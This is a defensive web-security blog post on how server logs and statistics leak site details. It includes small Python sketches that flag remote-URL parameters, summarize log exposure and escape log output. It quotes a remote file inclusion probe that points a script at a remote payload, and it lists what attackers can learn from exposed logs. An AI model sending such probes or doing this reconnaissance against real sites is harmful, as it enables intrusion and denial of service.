Following the "improve security" blog entry, we return to the issues associated with server log entries. This time we take a closer look at the purpose and possibilities of log entries that represent a hack attempt. Many of us see entries in the logs that are unrelated to the site's content and assume they are just attempts to compromise it. Let's see an example:
210.109.103.221 - - [01/Nov/2008:04:43:11 -0500] "GET //errors.php?error=http://somedomain.com/somescript.txt ....

The entry shows a GET request with invalid arguments. Such a request can serve the attacker in several ways. The obvious one is remote file inclusion: if the site has an errors.php script that accepts an "error" parameter without any filtering, the remote txt script may be injected and executed on the site. What is less obvious is that the GET request can be unique and so act as an identifier. Used together with a search engine, an identifier like this can locate other information about the site, such as the location of the actual log file on the real server. An ISP or host may store this information somewhere that is not properly protected. Search engines follow every link they find, so if the logs folder or files are linked in one way or another, their location will be revealed. Attackers may also post such links/requests on various pages across the internet where they know spiders will crawl them. To better understand this, check what results search engines return for "/errors.php?error=http://"
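To make the pattern concrete, here is a minimal Python sketch of how one might flag such requests in an access log. It assumes Common Log Format style entries; the function name remote_url_params and the sample line (a documentation IP, example.com, an "HTTP/1.1" suffix and a 404 status) are made up for illustration and are not taken from a real log.

```python
import re
from urllib.parse import parse_qsl

# Start of the quoted request in a log entry: "METHOD target ...
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)')

# A parameter value that starts like a remote URL is the warning sign.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def remote_url_params(log_line):
    """Return the (name, value) query parameters whose value is a remote URL."""
    match = REQUEST_RE.search(log_line)
    if match is None:
        return []
    target = match.group("target").rstrip('"')
    # Split on the first "?" by hand: a leading "//" in the path would
    # confuse a general-purpose URL parser into seeing a host name.
    _, _, query = target.partition("?")
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if REMOTE_URL_RE.match(value)
    ]


# Hypothetical entry, modelled on the one discussed above.
sample_line = (
    '192.0.2.10 - - [01/Nov/2008:04:43:11 -0500] '
    '"GET //errors.php?error=http://example.com/somescript.txt HTTP/1.1" 404 512'
)
print(remote_url_params(sample_line))
# [('error', 'http://example.com/somescript.txt')]
```

A check like this only spots the probe after the fact. The script that receives the parameter still has to filter it.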
At first glance, you may find the results of such a search amusing, but they are critical. The GET request itself may carry a known vulnerability for a web engine along with the identification string, so it serves directly as a hack mechanism, while indirectly it may give away the location of the site's server logs. Once an outsider can access the server logs, the possibilities are limitless, because the information exposed reveals various weaknesses. As you can now understand, search engines can be used as the propagation and communication means for the exploits that follow.

What is more disturbing is that in many cases the site owner is unable to do anything about it, even if he knows about and understands the problem, because this information is most likely controlled by the ISP, the host or an external entity that the site owner authorized in some way. A site owner does have the option to change hosts, or to remove from his site the script that is responsible for leaking internal information. It is imperative that the host uses secure methods and never exposes such information to the outside. It is just as important that statistics and other kinds of log information do not propagate outside the server by other means.

There are all kinds of services around the web for site statistics. In many cases the information is exposed with the approval of the site owner. Unknown to him, at some point in the past he deployed some sort of analysis JavaScript snippet that transfers the information to another server to "improve the site's traffic". This information is now exposed and accessible to anyone.

Going back to the search engine results, one can now see the location of every script and every other resource in use by the web site. Such information reveals pretty much everything, including:

- If there is an administration panel, which scripts are used for access. Authorization can of course be inferred from the 401 status code.
- If there is a webstats folder or other logs, their location and the scripts with the proper request.
- What forms the site uses, by checking the POST requests.
- Which request methods are accepted (POST, GET, HEAD, PUT etc.), which means an outsider knows exactly what script and parameters he has to use to upload something to the site.
- The IP that attempted to access certain scripts. For instance, in association with the 401 status code, an outsider learns the IP origin of the administrator.
- The ways the server may have a problem, by checking for the 500 status code. Certain requests can reveal it, and that information can later be used in DoS attempts.
- Whether there were already any successful uploads to the site. The log or statistics will show it, so an outsider does not need to waste time on injection attempts.
- The size of the document each script sends back for a request. This could be used in a DoS attack, as certain scripts can consume lots of bandwidth.
- Accidental 404s. Some of the logs may display just the 404s, but this information also includes the accidental 404s an attacker may seek out and utilize. In most cases accidental 404s come from the site's owner, again showing the IP, the script accessed etc.
- Possible propagation of parameters to subsequent scripts, cached by search engines, as described in our blog entry "filtering incoming parameters".
- The internal directory structure and the transports used for access, like FTP and HTTP, along with the protocols used and accepted by the server.
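To see how little effort it takes to pull several of these items out of an exposed log, consider the rough Python sketch below. It assumes Common Log Format entries. The helper summarize_exposure and the three sample lines (documentation IPs, made-up paths and sizes) are hypothetical and only illustrate the idea.

```python
import re
from collections import defaultdict

# ip, ident, user, [timestamp], "METHOD path ...", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def summarize_exposure(lines):
    """Collect what an outsider could learn from the given log lines."""
    report = {
        "methods": set(),                  # request methods seen
        "auth_clients": defaultdict(set),  # path -> IPs that received a 401
        "server_errors": set(),            # paths that returned a 5xx status
        "largest_response": {},            # path -> biggest non-zero size seen
    }
    for line in lines:
        match = CLF_RE.match(line)
        if match is None:
            continue  # skip lines that are not in the assumed format
        path = match.group("path").split("?", 1)[0]
        status = int(match.group("status"))
        size = 0 if match.group("size") == "-" else int(match.group("size"))
        report["methods"].add(match.group("method"))
        if status == 401:
            report["auth_clients"][path].add(match.group("ip"))
        if 500 <= status <= 599:
            report["server_errors"].add(path)
        if size > report["largest_response"].get(path, 0):
            report["largest_response"][path] = size
    return report


# Hypothetical log lines, for illustration only.
sample = [
    '192.0.2.10 - - [01/Nov/2008:04:43:11 -0500] "GET /admin/login.php HTTP/1.1" 401 381',
    '198.51.100.7 - - [01/Nov/2008:04:44:02 -0500] "POST /contact.php HTTP/1.1" 500 120',
    '198.51.100.7 - - [01/Nov/2008:04:45:30 -0500] "GET /catalog.php?page=2 HTTP/1.1" 200 48213',
]
report = summarize_exposure(sample)
print(sorted(report["methods"]))
print(dict(report["auth_clients"]))
print(report["server_errors"])
print(report["largest_response"])
```

Running the same kind of summary against your own logs is a quick way to judge what would leak if they ever became readable from outside.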
Plus many more; just use your imagination.

Our conclusion is that 404 pages in particular can be exposed in various ways: via web statistics, web logs, activity reports, external entities that handle traffic, search engines etc. Consequently their origin will be exposed, giving away information about the server, administrator, scripts, resources and parameters.

Some sites have specific modules that display the latest searches. As a result, these injection attempts propagate due to the lack of filtering within the site. For some strange reason these sites believe it is important to update page content automatically with up-to-the-minute results, and they expose their scripts to outsiders for no reason.

Accessing the web statistics is itself a threat, as it can compromise the local system. The site owner "trusts" the statistics tool (and/or whoever accesses the logs), and his browser may allow active content to run unfiltered. Many log entries may include JavaScript and XSS payloads in general, meant to run when the statistics script displays them and to hijack the browser or the PC.

Our advice is to investigate whether or not your site exposes that kind of information and to ask your host to take the necessary precautions. Also, do not use JavaScript or other types of active content that may reveal that kind of information outside your site. The server already keeps all the information needed to produce the relevant statistics. Keep in mind that no matter how expensive your SSL certificate is, or whether you're on a dedicated, virtual or shared server, the information exposed can compromise and consume all the resources you worked hard to set up. Whether you changed the administration folder, or obtained a certificate stating that your site is now PCI compliant and can process credit cards, is also irrelevant under such circumstances. If your customers knew that your server's information could be compromised in such ways, they would never buy anything from your e-commerce store.
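On the point about log entries that carry active content: any page that displays log data should treat every field as untrusted text. A minimal Python sketch follows, using the standard library's html.escape. The function render_log_row and the sample request are hypothetical, and a real statistics tool will build its pages differently.

```python
import html


def render_log_row(ip, request, status):
    """Build one HTML table row for a statistics page, escaping every field."""
    cells = (ip, request, str(status))
    escaped = (html.escape(cell, quote=True) for cell in cells)
    return "<tr>" + "".join(f"<td>{cell}</td>" for cell in escaped) + "</tr>"


# Hypothetical request that tries to smuggle a script into the report.
row = render_log_row(
    "192.0.2.10",
    "GET /search.php?q=<script>alert(1)</script> HTTP/1.1",
    404,
)
print(row)
```

With the fields escaped, the browser shows the injected markup as plain text instead of running it.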